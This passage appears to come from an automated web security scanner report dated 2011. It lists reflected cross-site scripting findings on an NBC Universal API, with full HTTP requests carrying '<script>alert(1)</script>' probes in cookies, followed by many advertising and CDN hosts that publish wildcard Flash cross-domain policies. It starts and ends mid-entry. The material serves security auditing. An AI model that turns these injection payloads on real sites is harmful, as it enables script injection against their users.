HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:16:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^1044f407298942487860d6b793; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60237; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1716

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3158455"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f1e19"-alert(1)-"aad8da393bf\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 5b8f5<script>alert(1)</script>aa3aff42c32 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:28 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the s_nr cookie is copied into the HTML document as plain text between tags. The payload 60d58<script>alert(1)</script>39205ed221 was submitted in the s_nr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=131344646830060d58<script>alert(1)</script>39205ed221; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:00 GMT
Content-Length: 207
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"131344646830060d58<script>alert(1)</script>39205ed221","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload 1a3d0<script>alert(1)</script>a48e60d2b0a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:03 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a"}});

4. Flash cross-domain policy  previous  next
There are 135 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://a1.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Xonnection: Xeep-alive
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://action.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Tue, 06 Sep 2011 16:45:41 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.4. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.5. http://admin.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.6. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:15f2"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.7. http://ads.rnmd.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.rnmd.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.rnmd.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
Last-Modified: Fri, 26 Aug 2011 16:48:34 GMT
ETag: "150291-80-4ab6b50e6dc80"
Accept-Ranges: bytes
Content-Length: 128
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


4.8. http://afe.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.9. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 23:17:09 GMT
Date: Mon, 05 Sep 2011 23:17:09 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 58526

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.10. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 15:37:49 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.11. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Tue, 06 Sep 2011 21:37:51 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

4.12. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.13. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.14. http://c.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.15. http://cache.specificmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n18 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 01:38:58 GMT
Age: 393610
Content-Length: 194
Content-Type: text/xml
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.16. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 14:56:31 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.17. http://cdn5.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 18
Content-Type: text/xml
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.18. http://clk.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.19. http://content.links.channelintelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2813"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:40 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.20. http://content.plymedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.plymedia.com

Response

HTTP/1.0 200 OK
Cache-Control: public, max-age=25
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:13:26 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:00 GMT
Content-Length: 682
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://core.insightexpressai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Tue, 06 Sep 2011 14:57:00 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

4.22. http://d.adroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:14 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 24 Aug 2011 20:02:16 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.23. http://d.ads.readwriteweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.ads.readwriteweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.ads.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:46 GMT
